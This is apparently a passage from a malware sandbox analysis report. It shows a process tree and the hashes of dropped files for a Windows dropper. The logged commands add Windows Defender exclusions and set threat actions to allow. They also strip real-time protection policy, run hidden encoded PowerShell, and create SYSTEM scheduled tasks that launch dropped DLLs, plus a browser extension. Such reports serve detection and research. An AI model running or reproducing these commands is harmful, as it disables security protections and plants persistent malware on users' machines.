                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1600
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1612
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1720
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:2684
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1980
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2036
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:2556
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:2300
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2460
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2752
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2816
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:996
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2196
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2876
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2492
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2668
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:2616
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3020
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1524
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2912
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2688
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /CREATE /TN "gbfUGSHgt" /SC once /ST 03:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                  3⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3024
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /run /I /tn "gbfUGSHgt"
                                                                  3⤵
                                                                    PID:2788
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /DELETE /F /TN "gbfUGSHgt"
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1692
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                    3⤵
                                                                      PID:2076
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1672
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2128
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                        4⤵
                                                                          PID:1728
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "mVwrlHrSDNRLOGqZG" /SC once /ST 03:13:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe\" uL /NafCdidyF 525403 /S" /V1 /F
                                                                        3⤵
                                                                        • Drops file in Windows directory
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:448
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "mVwrlHrSDNRLOGqZG"
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2580
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 628
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Program crash
                                                                        PID:1148
                                                                    • C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe
                                                                      C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe uL /NafCdidyF 525403 /S
                                                                      2⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Drops Chrome extension
                                                                      • Drops file in System32 directory
                                                                      • Drops file in Program Files directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:612
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                        3⤵
                                                                          PID:1764
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            PID:1560
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1596
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1792
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:804
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:908
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                6⤵
                                                                                  PID:604
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              PID:2996
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:1948
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:1788
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                  • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:684
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  5⤵
                  PID:2516
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:2384
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              4⤵
              • Indirect Command Execution
              PID:2256
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  5⤵
                  PID:2140
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2136
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          7⤵
                          PID:1068
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "bWNXgrRlacKgnUwPKK"
          3⤵
          PID:932
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
          3⤵
          PID:1616
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
              4⤵
              • Indirect Command Execution
              PID:2748
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1156
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2088
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                          7⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1276
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
              4⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:848
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2244
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2204
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2216
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rksWaXujU\EFzTpY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "AlVsOicJKGYGSUS" /V1 /F
          3⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2188
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "AlVsOicJKGYGSUS2" /F /xml "C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml" /RU "SYSTEM"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2672
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /END /TN "AlVsOicJKGYGSUS"
          3⤵
          PID:1780
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "AlVsOicJKGYGSUS"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1784
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "HqaqbRPcNxJZrD" /F /xml "C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml" /RU "SYSTEM"
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1860
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "KtgLbJTNbqQVX2" /F /xml "C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml" /RU "SYSTEM"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1932
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "CaeXOOsQHbNfKhlUh2" /F /xml "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml" /RU "SYSTEM"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2404
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "eUzrIsCcCKtUEuKCBuS2" /F /xml "C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml" /RU "SYSTEM"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1972
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "KOXGBKFkHUHlhNtav" /SC once /ST 00:23:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll\",#1 /aNdidF 525403" /V1 /F
          3⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:1980
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "KOXGBKFkHUHlhNtav"
          3⤵
          PID:2040
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "mVwrlHrSDNRLOGqZG"
          3⤵
          PID:2440
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 1540
          3⤵
          • Loads dropped DLL
          • Program crash
          PID:2028
    • C:\Windows\system32\rundll32.EXE
      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
      2⤵
      PID:2288
        • C:\Windows\SysWOW64\rundll32.exe
          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
          3⤵
          • Blocklisted process makes network request
          • Checks BIOS information in registry
          • Loads dropped DLL
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          PID:2704
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /DELETE /F /TN "KOXGBKFkHUHlhNtav"
              4⤵
              PID:2668
• C:\Windows\system32\taskeng.exe
  taskeng.exe {A9D37EFA-5736-4263-8B18-5CF7CD4EAAC9} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
  1⤵
  PID:2356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2396
        • C:\Windows\system32\gpupdate.exe
          "C:\Windows\system32\gpupdate.exe" /force
          3⤵
          PID:1804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2276
        • C:\Windows\system32\gpupdate.exe
          "C:\Windows\system32\gpupdate.exe" /force
          3⤵
          PID:2736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1628
        • C:\Windows\system32\gpupdate.exe
          "C:\Windows\system32\gpupdate.exe" /force
          3⤵
          PID:3052
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:876
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:2796
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:2656

Downloads

• C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml
  Filesize: 2KB
  MD5: b731bebaa7c2551eed44d76cd5e76ff3
  SHA1: 965b3a0c57891661454681f1f6acbcb282321fd0
  SHA256: 81df7344c54b6be5bece3eacf37ab55125a13111f348b1107af482dfcdb27891
  SHA512: fa747a132f7ea38ae407808fe298243f21d7bb725e79c2e9ba793f2bacaf3277d958d43355ea53e6871024d9a303a3f1eda7dee46b1d06b5122253d9aad67817

• C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml
  Filesize: 2KB
  MD5: 3019b73c639d36635656868079266e22
  SHA1: 02ba8c9fae452ba2d13b73330a34a69f5245b550
  SHA256: 2c341aa3858b5cc69c135865c8cdc895afc5011b6e5ec27ecbfe765c076f4d4e
  SHA512: e8e5aab3bccaaf31364fc14a44c2ab33004c2dcd7987cd34342657ebf5a1ef737b723732411733c011e25bd7d2dd1cdb14eb63fd538fe8f9e2f43e188fd61a1a

• C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml
  Filesize: 2KB
  MD5: 7f074d6d3dc8ba867cb1a9595d75fa82
  SHA1: ba9940e7d8e308900dd00ccba56792267e8fd760
  SHA256: 013b14d5876c1cd228c502195410fb6fc4e3d5d1bab9ef8b2510aa7559de6afe
  SHA512: fddece89e378bbc5115792e7d65e08ed0b9e0d72bf36e682891e46c21493ad1a80071eb53bedaf1011859e9c8e7f830504610c3e61305b631dce72f988778562

• C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml
  Filesize: 2KB
  MD5:

                                                                                                              e3124c51196627235f81021202497539

                                                                                                              SHA1

                                                                                                              47c94b60c6beda449239806d837a6aa9db5e9f24

                                                                                                              SHA256

                                                                                                              41fcef80af53d1b93a4f92c8e636572d8c4aeecb5fc3214e6ef61a0225f69b73

                                                                                                              SHA512

                                                                                                              b7b7583d5106f43ba4b28e6963f6d8e934626e79438bc1c33cedc63f04e4b6031caa2ff4f9fa933a61a26bb458b7b59eeea9b38553fe08c59c99cc91242582d8

                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                              MD5

                                                                                                              2f02cc2a0c1066593cac569fb44fde98

                                                                                                              SHA1

                                                                                                              cdef228219837ccb3c7061afcd70760ef0b9c720

                                                                                                              SHA256

                                                                                                              a32071cd6aa585d567c0f5425759c85098b1f460ef320f7ad43c9ac635f3fca5

                                                                                                              SHA512

                                                                                                              0f9e6449d02e31fc4ebabd09bf03d454dceb703968b9c53b771512bd045ea7256df091f792b856463d03e5a8e17f40e28c826d20ec710b0cc2e92eee524269f1

                                                                                                            • C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              a6e25931e5fcd838c93db33dda4ef846

                                                                                                              SHA1

                                                                                                              6bee9fe9acfe5d3901a5748029aa5b1aa14ddf63

                                                                                                              SHA256

                                                                                                              dc0e3e35c22281d704d36d12deb132362a384d008a5bdff0344054d52281d825

                                                                                                              SHA512

                                                                                                              dae9b7d2c5a077e1adc8e8ac289cdbddf621caadea092acb2a06ba5fbfb1f785b0f37e4573d73952ecdc6198ddf78df2900fa6321d647ac8f867899471b3c3bb

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                              Filesize

                                                                                                              187B

                                                                                                              MD5

